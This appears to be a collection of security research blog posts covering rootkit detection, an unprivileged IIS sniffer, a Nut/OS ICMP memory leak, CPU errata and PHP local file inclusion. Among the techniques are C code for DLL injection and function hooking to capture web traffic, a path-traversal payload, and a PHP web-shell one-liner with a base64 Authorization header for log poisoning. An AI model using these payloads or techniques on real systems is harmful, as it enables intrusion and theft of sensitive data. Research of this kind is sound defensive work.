ThotCon 0x01

For those who haven’t heard Greg Ose and I will be presenting at the first annual ThotCon on April 23 in Chicago. If you haven’t gotten your ticket yet you will need to hurry as they are almost gone. Our talk is called Forensic Fail: Malware Kombat and will cover some of the failings of digital forensics. We also have a surprise lined up for the end so if you are in the area you won’t want to miss it.

You can register for the conference at http://www.thotcon.org/registration.html. We hope to see you there.

Hacker Halted 2009

As many of you know, Greg Ose and I recently spoke at Hacker Halted 2009 in Miami. We discussed a distributed password cracker that we designed and implemented that utilizes redirected browsers to build a swarm of worker nodes. The method which we demonstrated can be implemented using large numbers of otherwise useless stored cross-site scripting vulnerabilities. The client-side worker was implemented as a Java applet in an injected iframe.

Greg and I also showed several methods which can be used on different platforms to trick the Java virtual machine into continuing execution after a client has closed the page where it is embedded. This can be used to maintain large numbers of workers even when the vulnerable sites are not visited for long periods of time.

The following video shows the administrative interface to DistCrypt where we can add and manage password hashes.

You can view the high quality version here.

You can also view the slides from our presentation on the Hacker Halted website here.

What do Rootkits and Xerxes have in common?

By: Cris Neckar and Greg Ose

Just think of your kernel as Greece…

It’s probably not the first thing you expected to hear me say but bear with me. The arms race between rootkit development and detection has been raging for years, and although there have been great advancements in detection, rootkit developers have always had the upper hand. You simply cannot defend against what you cannot predict. Recently the battle has become increasingly heated as rootkit developers dig deeper and deeper. One only need look at the Blackhat Briefings for the past few years to see the trend.

Increasingly subversive and complex rootkits threaten to over-run our kernels and turn our business critical systems into slaves. So what are we to do? Should we simply throw up our hands and resolve ourselves to a life of bondage?

To answer this question lets approach the problem from a different angle. It has become clear that we cannot simply monitor everything a rootkit developer might change. There are just too many function pointers, operating modes, and devices to allow us to watch them all. However, one commonality does exist in all kernel mode rootkits. In some way they must all be inserted into the kernel.

There are a number of ways to introduce new code into a running kernel but not nearly so many as there are places to hide once inside. I propose that, instead of building a blacklist and peeking under all the rocks where they have hidden in the past, we instead monitor the entry point. Leonidas used a similar approach when Xerxes threatened Greece, instead of fighting on even ground the Spartans guarded the narrow door through which the Persians must travel to enter Greece.

So, you say, it’s a great theory, but how do we implement it?  Assuming an attacker has compromised a system’s most privileged usermode context, for instance a process running as root, code can be introduced into the running kernel in a number of ways. The most obvious of these is to install a module or driver and be done with it. Aside from that, an attacker would need to patch kernel memory directly, this is not trivial but is still a common method of rootkit insertion. Aside from these options, the attacker would be forced to edit the kernel binary, or an existing module on disk and either cause or wait for a reboot (There is one additional threat which we will save for later). The interesting thing about all of these potential insertion points is that they are events which would almost never occur in a production server (If they do occur an administrator will certainly be aware of the reason). By monitoring these few events we would be notified of the insertion of any existing kernel mode rootkit that I am aware of, as well as any that could be written in the future (barring a further vulnerability.. more on this later).

To implement this on Linux is actually fairly trivial. To monitor for code inserted into the kernel while running we can use the tricks of rootkit developers ourselves. Namely we can hook sys_init_module (for module insertions), and the write() handlers within the kmem and mem file operations structures (for writes to /dev/(k)mem where these are still possible).

The next step is to defend against changes made to kernel components on disk. For the kernel image itself, on a system which is rarely rebooted such as a production server, it is possible to accomplish this by booting a known good kernel. For example a kernel could be booted from media which is only physically attached to the system when the kernel is initially loaded into memory. A similar approach could be used with required kernel modules, or if preferable, they could be compared on load to known good check sums.

Now that we have covered the entry points we can focus on what to do once one of these events occurs. We do not actually need to prevent the insertion as, in some cases, these events may legitimately occur (once a root compromise has occurred a re-image of the system is generally the best approach anyway). Instead we simply need to securely log the event to a location which is not controlled by the intruder. Obviously we can not log locally. Additionally we cannot log with mechanisms which are already under the attackers control (anything accessible from user mode is out). One relatively trivial solution is to simply create a syslog packet and drop it on the network stack when one of our traps triggers. This will provide us with a remote log on a system which (hopefully) has not been compromised. When implementing this you would of course want to be careful to temporarily disable any netfilter hooks (think iptables) as these could allow the intruder to block our logging packet from usermode.

Like Sparta’s defense at Thermopolae, this method also has its mountain path. I mentioned earlier that there was an additional method for introducing code into a running kernel. This would involve the existence of a vulnerability within the kernel or a loaded module which allows arbitrary memory to be written. An attacker could create an exploit which uses such a vulnerability to introduce a rootkit into the kernel. We cannot possibly predict where an exploit will occur (if we could, vulnerability research would be a lot easier :) ) making it impossible (so far ;) ) to guard against this threat using this method. Fortunately a rootkit which used this installation method would be obsolete the moment it was first detected. This means that this type of rootkit could never reach widespread usage and would most likely be used only in a very targeted attack.

Unprivileged Sniffing

The standard attack path against a hardened system almost invariably involves escalating privileges locally. Privileged access allows the attacker to do things like access all data on the server, sniff network traffic, and install root kits or other privileged malware. Typically, one of the goals of host hardening is to limit the damage that an attacker can do who has gained access to an unprivileged account. “Successfully” hardening a web server, for example, involves preventing the account used by the httpd service/server from modifying the source code of the application it hosts.

Imagine a web server that handles sensitive information, let’s say credit card numbers. This application runs through an interpreter invoked by a web server running as an unprivileged user. No matter how this data is encrypted when at rest, if it can be decrypted by the application, an attacker with the ability to invoke an arbitrary process at the same privilege level as this application will be able to recover the data. This is not true however of data which is stored as a hash or encrypted using an asymmetric public key where the private key is not present. In these cases an attacker is often forced to escalate local privileges to sniff data in transit either via network sniffing, or modifying encryption libraries. Even when data is stored in a retrievable format, especially on hardened systems, recovering this ultimately obfuscated data can be a daunting task for an attacker. Many applications now employ a multi-tiered approach which requires a significant amount of time and effort to attack and gain access to the critical keys or algorithms.

Given the architecture of Windows servers however, it is possible, via access to an unprivileged account such as Local Server, to implement a form of unprivileged sniffer which will monitor sensitive information as it is passed through the target application. This can be implemented in a way which would allow an attacker to trivially monitor all data in motion through the application. In the case of a web application this would include any parameters within a request, data returned by the server, or even headers like those used for basic authentication. This method is generic across applications and can be used to sniff encrypted connections.

The unprivileged sniffer doesn’t employ any tactics that are strictly new and although we haven’t seen this implemented in malware to date it wouldn’t be surprising if something similar has been done. The implementation I will describe is effective against IIS 6 but similar things could be implemented for other applications (SQL Server and Apache come to mind).

The first challenge in hooking into an IIS worker process or Application Pool (w3wp.exe) is knowing when it will start. A request coming into IIS is handled by the W3SVC service and passed off to an Application Pool via a named pipe. The service will either instantiate a new worker process passing the pipe name as an argument or assign the connection to an existing worker. The difficulty is that as the “Local Server” user we can not hook into the W3SVC itself so we must either constantly watch for new instantiations of ‘w3wp.exe’ or have some way of knowing when they start. By monitoring named pipes using the undocumented API ‘NtQueryDirectoryFile’ we can watch for the creation of pipes that start with ‘iisipm’. A pipe will be created each time a new worker is initialized giving us a head start hooking the new process.

Now that we know a process will be created we can do a standard library injection using code similar to the following to identify it and inject our sniffer. In this code LIBNAME represents the name of the DLL to inject.

PROCESSENTRY32 entry;

HANDLE snapshot;

BOOL r = FALSE;

DWORD TargetPID = NULL;

HANDLE Proc;

LPVOID LoadLibAddr, RemoteName;

/* Find the PID of the “w3wp.exe” process. */

entry.dwSize = sizeof(PROCESSENTRY32);

if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, (unsigned long)NULL)) != INVALID_HANDLE_VALUE) {

for (r = Process32First(snapshot, &entry); r; r = Process32Next(snapshot, &entry)) {

if (strstr(entry.szExeFile, “w3wp.exe”)) {

TargetPID = entry.th32ProcessID;

}

}

CloseHandle(snapshot);

}

if (!TargetPID) return;

/* Open the process */

if ((Proc = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, FALSE, TargetPID)) == NULL) return;

/* Get the address of “LoadLibraryA” to use as our remote thread procedure */

if ((LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandleA(“kernel32.dll”), “LoadLibraryA”)) == NULL) goto out;

/* Allocate a block of memory within “w3wp.exe” to hold the name of the DLL we are injecting and copy it in */

if ((RemoteName = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(LIBNAME) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE)) == NULL) goto out;

if (!WriteProcessMemory(Proc, (void *)RemoteName, LIBNAME, strlen(LIBNAME) + 1, NULL)) goto out;

/* Create a thread within “w3wp.exe” which will load our DLL into memory */

CreateRemoteThread(Proc, NULL, (unsigned long)NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (void *)RemoteName, (unsigned long)NULL, NULL)

out:

CloseHandle(Proc);

We now have our library loaded into the address space of the worker process. When this occurs the entry point of our library will be called. We will use the concept of a trampoline to hook certain calls within the w3wp process. Specifically IIS uses a library called HTTPAPI for passing around HTTP requests and responses. By hooking into the following calls we can examine requests and responses passed through this worker.

  • HttpReceiveHttpRequest
  • HttpReceiveRequestEntityBody
  • HttpSendHttpResponse
  • HttpSendResonseEntityBody

As an example the following stub shows one way of hooking ‘HttpReceiveHttpRequest’.

/* This will store the address of the HttpReceiveHttpRequest function */

typedef ULONG (*HttpReceiveHttpRequestType)(HANDLE, ULONGLONG, ULONG, PHTTP_REQUEST, ULONG, PULONG, LPOVERLAPPED);

HttpReceiveHttpRequestType HttpReceiveHttpRequestSaved;

/* The trampoline structure is used to save both the original 6 bytes of the function we are hooking and the new instructions we replace them with */

typedef struct _trampoline {

char push;

void *func;

char ret;

} Tramp, *PTramp;

Tramp HRHR, oldHRHR;

HMODULE lib;

SIZE_T i;

/* Ensure that HTTPAPI.dll has been loaded */

lib = LoadLibraryA(“HTTPAPI.dll”);

/* Save the address of “HttpReceiveHttpRequest” */

HttpReceiveHttpRequestSaved = (HttpReceiveHttpRequestType)GetProcAddress(lib, “HttpReceiveHttpRequest”);

/* 0x68 is the x86 PUSH instruction */

HRHR.push = 0x68;

/* We are pushing the address of our hook */

HRHR.func = (HttpReceiveHttpRequestType *)&HttpReceiveHttpRequestHook;

/* 0xC3 is the x86 RETN instruction which will pop the value we just pushed and jump to that location. This effectively hijacks the flow of execution */

HRHR.ret = 0xC3;

/* We then read the original 6 bytes of the HttpReceiveHttpRequest function */

ReadProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* And replace it with our trampoline code */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

We have now replaced the first six bytes of the ‘HttpReceiveHttpRequest’ function mapped within the ‘w3wp.exe’ process to redirect the flow of execution into our hook procedure. Now by creating a hook we can sniff any data passed through this function by implementing code similar to the following.

ULONG HttpReceiveHttpRequestHook(HANDLE ReqQueueHandle, ULONGLONG RequestId, ULONG Flags, PHTTP_REQUEST pRequestBuffer, ULONG RequestBufferLength, PULONG pBytesReceived, LPOVERLAPPED pOverlapped) {

ULONG ret;

SIZE_T i;

HANDLE log;

/* First we replace the first 6 bytes of the real ‘HttpReceiveHttpRequest’ function with their original value */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* We then call the real function and save the return value */

ret = HttpReceiveHttpRequestSaved(ReqQueueHandle, RequestId, Flags, pRequestBuffer, RequestBufferLength, pBytesReceived, pOverlapped);

/* At this point all data with the HTTP_REQUEST stored at pRequestBuffer is valid and can be saved to a file or sent out over the network. This data includes the request headers and Get parameters passed with the request */

/* After we have performed our sniffing operations we write our trampoline back into the real function */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

/* And return the saved return value */

return ret;

}

If similar hooks were implemented for each of the functions listed above all information in and out of IIS could be sniffed in a way which is generic to the web application being used.

Although this implementation is deliberately incomplete it demonstrates one use case for an unprivileged sniffer. This type of attack is possible in Windows due to  specifics of process creation and how privileges are dropped. It is worth mentioning that a similar attack is generally not possible in similar Linux services. In Linux the ability to ptrace a process is controlled by the dumpable flag within the mm member of the process’ task_struct. When privileges are dropped the dumpable flag is unset and this is inherited when a fork or execve occurs. This prevents the owning user of the resulting process from modifying the process’ execution. Because lower privilege workers are not newly created processes in Linux but rather inherit their task_struct from the root owned parent, they are not debuggable by the lower privileged worker account.

We are not currently aware of a way of preventing this type of attack. The Windows privilege structure, and individual privileges such as the seDebugPrivilege are not designed to prevent access to the owning user. If a fix is possible it would likely relate to the creation of the worker processes and would require modification of the individual applications. If you have an idea for a fix please let us know.

Exploiting Embedded Devices (Part 1)

Recently we have been assessing an increasing number of embedded devices. Seeing as the methods for carrying out this type of assessment are not at all well defined, I am starting a series of posts discussing vulnerabilities and exploitation on embedded platforms.

In recent years the exploitation of common vulnerability classes on the most popular platforms has become increasingly difficult. Although vulnerabilities are still common, especially in client side applications, exploiting these vulnerabilities often becomes a complex matter of bypassing multiple protection mechanisms including stack cookies, heap verification, and data execution prevention. However, with the move towards miniaturization, products are increasingly giving up these protections and moving to largely untested platforms. Often the base libraries and operating systems chosen for these devices contain trivially exploitable vulnerabilities.

Several months ago I assessed a product which included a networked device based on Nut/OS. This minimal operating system describes itself as follows:

Nut/OS is an intentionally simple RTOS for the ATmega128, which provides a minimum of services to run Nut/Net, the TCP/IP stack. It's features include:
+  Non preemptive multithreading.
+  Events.
+  Periodic and one-shot timers.
+  Dynamic heap memory allocation.
+  Interrupt driven streaming I/O.

Main features of the TCP/IP stack are:
+  Base protocols ARP, IP, ICMP, UDP and TCP.
+  User protocols DHCP, DNS and HTTP.
+  Socket API.
+  Host, net and default routing.
+  Interrupt driven Ethernet driver.

While assessing the device, one of the most exposed components was the network stack. Some discussion of the network stack of this minimal operating system is in order. The vulnerability I will discuss has now been patched but the vulnerable version of the operating system can be downloaded here. An incoming IP packet is passed from the device driver into NutEtherInput() and on into NutIpInput() where it is demuxed to determine its protocol and passed to the appropriate component. Within NutIpInput(), on line 187 of net/ipin.c, the length of the IP header is calculated and used without being verified for sanity. The length of the IP header is a 4 bit value which is multiplied by 4 to determine the length in 32 bit words. Later on lines 250, 251, and 252 several lengths are calculated based on this value as well as the unchecked length for the entire packet. This vulnerability leads to a number of interesting conditions throughout the network stack where pointers to protocol headers and data are calculated based on incorrect IP header lengths.

void NutIpInput(NUTDEVICE * dev, NETBUF * nb) {
...
ip_hdrlen = ip->ip_hl * 4;
if (ip_hdrlen < sizeof(IPHDR)) {
NutNetBufFree(nb);
return;
}
...
nb->nb_nw.sz = ip_hdrlen;
nb->nb_tp.vp = ((char *) ip) + (ip_hdrlen);
nb->nb_tp.sz = htons(ip->ip_len) - (ip_hdrlen);

The most interesting of these, from the perspective of exploitation, are strangely in one of the simplest protocol handlers; namely ICMP. This arises largely from the fact that the buffers allocated for incoming echo requests are reused for the responses. The responses are sent through NutIcmpOutput() in net/icmpout.c. To exploit this we need data to be written to a pointer which can be pushed forward into another chunk of heap memory by specifying an incorrect IP header length. Only two writes meet these criteria. The first is the type field of the ICMP packet and in this case will always be NULL. Although it may be possible to gain execution in some cases with the ability to overwrite heap memory with a null, in this case, there is a more interesting alternative. The second field which is written is a checksum of the ICMP portion of the packet (which is data that we control at least parts of). So, by specifying an IP header length which is larger than the true length (typically 5) and controlling the calculated checksum, we can write an arbitrary 2 bytes to any 32 bit boundary within 9 (the largest IP header length 15 minus (the smallest IP header = 5 plus the size of the ICMP header = 1)) words of the end of our packet in memory.

int NutIcmpOutput(uint8_t type, uint32_t dest, NETBUF * nb) {
ICMPHDR *icp;
uint16_t csum;
icp = (ICMPHDR *) nb->nb_tp.vp;
icp->icmp_type = type;
icp->icmp_cksum = 0;
csum = NutIpChkSumPartial(0, nb->nb_tp.vp, nb->nb_tp.sz);
icp->icmp_cksum = NutIpChkSum(csum, nb->nb_ap.vp, nb->nb_ap.sz);
return NutIpOutput(IPPROTO_ICMP, dest, nb);
}

This leads us to another difficulty, the Nut/OS heap implementation (specifically the use of singley linked lists). I will go into this in more detail in another post but for now I want to talk about another vector for the exploitation of this vulnerability. In many cases the rather limited memory of an embedded device contains information that would be useful to an attacker. Things like encryption keys, and passwords are all stored in the same address space that the network stack is operating on. If you have been following along you may see where I am going with this. When we specify a packet length (not ip->ip_hl but instead ip->ip_len) in the IP header of an ICMP echo request that is larger than the actual packet sent, a condition results where the excess length for the echo response is pulled from the memory directly after the allocated buffer. By sending a ICMP echo request with no data and a long length we can effectively read chunks of memory from the vulnerable device. To obtain the maximum amount of memory it is possible, by forcing allocations and deallocations using particulars of the TCP stack, to change the location where the packet buffer is allocated.

Visualizing the attack with ninjas

Visualizing the attack with ninjas

By manipulating the heap it is possible to rebuild large sections of the vulnerable devices memory based on the data segment of the returned ICMP responses. In many cases this will give the attacker everything they need to further compromise the system. Even when no critical encryption key or password exists in memory which can be leaked this attack is extremely useful in helping to facilitate a more typical heap corruption exploit.

I want to touch briefly on the steps that can be taken by device manufacturers to avoid this type of vulnerability. It is not sufficient to assume that because it is an embedded device it will not be attacked. As the popularity of deploying this type of system on the internet continues to grow greater numbers of attackers will focus on these platforms simply because exploitation is often easier. When deploying internet enabled devices the same precautions should be taken as with more conventional platforms like Windows and Linux. During the design process, base libraries and operating systems should be vetted through security review prior to inclusion in a product. I expect to see much more research into these platforms as ethernet adapters and wireless interfaces are added to more and more devices.

Exploiting Erroneous Errata

Recently I was reading through the line-up for the Hack in the Box Conference which will be held in Malaysia this October. The following talk made my ears perk up: “Remote Code Execution Through Intel CPU Bugs” By Kris Kaspersky. Briefly, this talk will cover the exploitation of Intel processor errata. Yes you heard that right, Kris has managed to exploit hardware bugs. He goes on to say that they have developed PoC code which allows for remote exploitation of at least on of these bugs.

When I first came across this I was impressed to say the least. I decided to re-read the Intel Errata to see if I could spot the exploitable conditions. There was some discussion when these were first released, including speculation into the exploitability of several of these, but like most people I didn’t think much of it (OS developers flip out all the time).

After reading through the Intel Core 2 documents I decided to check out the revisions for the Athlon 64 as well. That’s where I ran across this gem:

Errata 95: “RET Instruction May Return To Incorrect EIP”

Speaking of exploitability… Lets see what causes this.

In order to efficiently predict return addresses, the processor implements a 12-deep return address stack to pair RETs with previous CALLs.

Under the following unusual and specific conditions, an overflowed hardware return stack may cause a RET instruction to return to an incorrect EIP in 64-bit systems running 32-bit compatibility mode applications:

• A CALL near is executed in 32-bit compatibility mode.
• Prior to a return from the called procedure, the processor is switched to 64-bit mode.
• In 64-bit mode, subsequent CALLs are nested 12 levels deep or greater.
• The lower 32 bits of the 64-bit return address for the 12th-most deeply nested CALL in 64-bit mode matches exactly the 32-bit return address of the original 32-bit mode CALL.
• A series of RETs is executed from the nested 64-bit procedures.
• The processor returns to 32-bit compatibility mode.
• A RET is executed from the originally called procedure.

So lets assume you have a 32 bit application running in compatibility mode that you would like to exploit and can force a somewhat long function to be repeatedly called.  You could create a 64 bit thread with a very tight function that recursively calls itself 12 times and returns to a address which matches (lower 32 bits) the return of the function you are targeting.This would create a bit of a race, but it would be very winnable given a slightly complex target and a tight exploit loop.

Of course the errata doesn’t detail what the incorrect return address might be but assuming it can somehow be predicted or controled this could be a fun little bug. This specific bug only exists on a small subset of AMD hardware, specifically CPUIDs 0xF51, 0xF58, and 0xF48. If anyone has a processor with the bug and would like to experiment with it I would love to hear from you.

Local File Inclusion – Tricks of the Trade

By: Cris Neckar, Andrew Case

Everyone understands that local file includes are bad. The ability to execute an arbitrary file as code is unquestionably a security risk and should be protected against. However, the process of exploitation can be rather involved and is commonly misunderstood. In this post I want to clarify the risks involved in this type of vulnerability and the complications involved in exploitation.

To start lets give a bit of background. I will focus on PHP on Linux specifically but this class of vulnerability may also exist in many other interpreted languages on different platforms. Generically, a file inclusion vulnerability is the dynamic execution of interpreted code loaded from a file. This file could be loaded remotely from an http/ftp server in the case of remote inclusions, or as I will cover, locally from disk. Generally remote file inclusion vulnerabilities are trivial to exploit so I will not be covering them. The following line is an example of a local file inclusion vulnerability in PHP:

require_once($LANG_PATH . ‘/’ . $_GET[‘lang’] . ‘.php’);

In this case an attacker controls the “lang” variable and can thereby force the application to execute an arbitrary file as code. The attacker does not however control the beginning of the require_once() argument, so including a remote file would not be possible. To exploit this an attacker would set the ‘lang’ variable to a value similar to the following:

lang=../../../../../../file/for/inclusion%00

Before we get into discussing the exploitation of this type of vulnerability let me say a few words about preventing them. In the preceding case, the vulnerability could be trivially mitigated through input validation. A simple check for non-alphanumeric characters would suffice in this case. However, where possible I would recommend completely avoiding user input for this type of logic and instead selecting the proper include from a hardcoded list of known good files based on a user supplied index number or hash.

Now that we know how to avoid these when developing applications lets get back to methods of exploitation. A straight forward vulnerability such as this one can in fact be quite difficult to reliably exploit given the differences in deployment platforms. When developing an exploit the first question to ask yourself is generally “what do I need for successful exploitation?”. In this case, the answer to that question is a file stored locally on the target system which contains PHP code that accomplishes our goal. In the best case we will be able to include a file which we directly control the contents of.

This can be an interesting puzzle as it is almost a case of chicken before the egg. To gain access to the remote system we need the ability to create a file on the remote system. The first possibility, and by far the simplest, is to look at the features provided by the application we are attacking. For example, many local inclusion exploits use features such as custom avatars and file storage mechanisms to place code on the target system. Bypassing various checks performed on these types of files/images can be an interesting puzzle in itself and the details are best saved for a future post. However, we want to talk about these vulnerabilities on systems which do not allow such trivial exploitation.

If the target application does not provide some way of uploading or changing a file on disk we need to examine other options. I suggest examining all access to the target server. Ask yourself “What services are available to me and what files to they access? Do I control any of the data written to these files?”. An anonymous FTP server or similar would certainly make life easier here but that would be to good to be true. :)

Generally when people discuss local includes the assumption is that the target file will be the HTTP servers logs. It is quite easy to influence the contents of log files as their purpose is to store the requests that you, the user, make. Most people will suggest the logs and conveniently glaze over the complexities that their usage presents. There are several major potential hurdles in the use of logs.

First we run into the problem of finding the logs. In a production environment it is rare to use default paths for log data, ‘/var/log/httpd/access_log’ is simple enough to guess but what do you do when the log is stored in ‘/vol001/appname.ourwidget.com/log’. Guessing this path would be non-trivial at best and even assuming that verbose error messages or a similar information disclosure gives you some hint to directory structure, using these methods in a reliable exploit would be extremely difficult.

To jump this hurdle lets examine an interesting feature of the Linux proc file-system, namely, the ‘self’ link. The Linux kernel exports a good bit of interesting information about individual processes to usermode through the proc entries for each process id. It also creates an entry called ‘self’ which provides a process easy access to its own process information. When we access /proc/self through the context of a PHP include the link will, in most cases, point to the process entry for the httpd child which has instantiated to PHP interpreter library (This may not be the case if the interpreter has been called as CGI). Often when an HTTPd is run, the path to its configuration file is passed as an argument. If this is the case, finding the log file is a simple procedure of including ‘/proc/self/cmdline’, reading the location of the configuration file and including it to find the path to log files.

Viewing the apache cmdline proc entry

Viewing the apache cmdline proc entry

If the ‘cmdline’ entry does not contain the configuration file there is another option. The per process proc entry also contains a directory entry called ‘fd’. This directory exports a numbered entry for each file descriptor that the process currently holds. In writing PoC for this post on a 2.6.20 kernel we noticed that at some point a kernel developer had the foresight to set the permissions on these entries so that they could be read only by the instantiating user. We tasked intern Y with finding the change and, after grepping the diffs of every kernel release (ever… i.e. wget -r –no-parent http://www.kernel.org/pub/linux/kernel/) he found the following. In May of 2007 the following patch was entered to address the case where a process opens a file and then drops its permissions (Interesting, that is exactly what Apache does).

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=8948e11f450e6189a79e47d6051c3d5a0b98e3f3

This change was committed around the release of version 2.6.22. Using this new access we are able to directly access the files opened by the apache process through these proc entries. By iterating the file name from ‘0’ we are able to directly access the HTTPd log file which will undoubtedly be open for use by the web server. Simply include the files ‘/proc/self/fd/<fd number>’ until you hit on the right file descriptor.

Using the fd proc entries to access apache logs

Using the fd proc entries to access apache logs

Great, so we found the log file. Now we need to determine what fields we actually control. It is commonly believed that you can arbitrarily enter text into apache logs by putting code into GET variables or the requested path. This is generally not the case as these values will almost always be URL encoded and will therefore not execute correctly. I find the simplest field to use is actually the user name. This is pulled from the Authorization header which is typically base64 encoded and thereby avoids the URL encoding mechanisms. By base64 encoding a string similar to the following:

<?php passthru($_GET[‘cmd’]); ?>:doesn’t matter

And specifying an Authorization header as follows:

Authorization: Basic PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz46ZG9lc24ndCBtYXR0ZXI=

We can insert arbitrary code into the HTTP logs.

PHP code as basic auth username

PHP code as basic auth username

Assuming the stars align and this method is successful there is still one more caveat. On production HTTP servers the logs files tend to be rather large, often in the range of 200mb. Your PHP code is going to be at the very end of the current log file which will likely mean that for each command you run it will take a very long time (depending on connection speed) to wait for the page to display the output from your command. It is possible to use the error_log as this is likely somewhat smaller, but these can still be rather larger than we would hope.

We now have somewhat reliable ways to get code execution, but I hear you saying “There must be a better way”. I am going to present a method which is specific to PHP and somewhat specific to the target application. This is a very common scenario but if it does not fit your needs I hope that it will at least help you to get into the right mindset for this type of exploit development.

PHP provides a mechanism for maintaining session state across requests. Many other languages provide similar interfaces but their internals are sometimes quite different. In the case of PHP a session is started using, logically enough, session_start(). This code can be found is ‘/ext/session/session.c’ within the PHP codebase. Briefly, it checks whether a session cookie was sent with the current request, if not it creates a random session id and sets the cookie within the response to the user. It also registers the global $_SESSION variable which is directly tied to a file stored in the temporary directory. This file will contain any variables set under the session context formatted as a PHP array.

In the case of an application which tracks session information, any setting stored as a string which the user controls could provide an excellent target for a local file include vulnerability. The session file will be named ‘sess_<session_id>’. Although the session_id is a random hash it is trivial to retrieve as it is stored locally in a cookie.

Viewing the PHP session cookie

Viewing the PHP session cookie

In our simple example, our session has a few variables but the simplest to control arbitrarily is a field called ‘signature’. PHP applications tend to store all sorts of interesting things in session variables and there is often a string that you control arbitrarily. In this case by setting our ‘signature’ to PHP code we can gain command execution through this session file.

Putting it all together

Putting it all together

Although the specific methods I have outlined here will not always work in your particular situation I hope that I have at least prompted some interest in the many possibilities for exploiting this type of vulnerability. Regardless of how limited you feel by the platform you are exploiting there is almost always some trick that you can use to get the better of the system.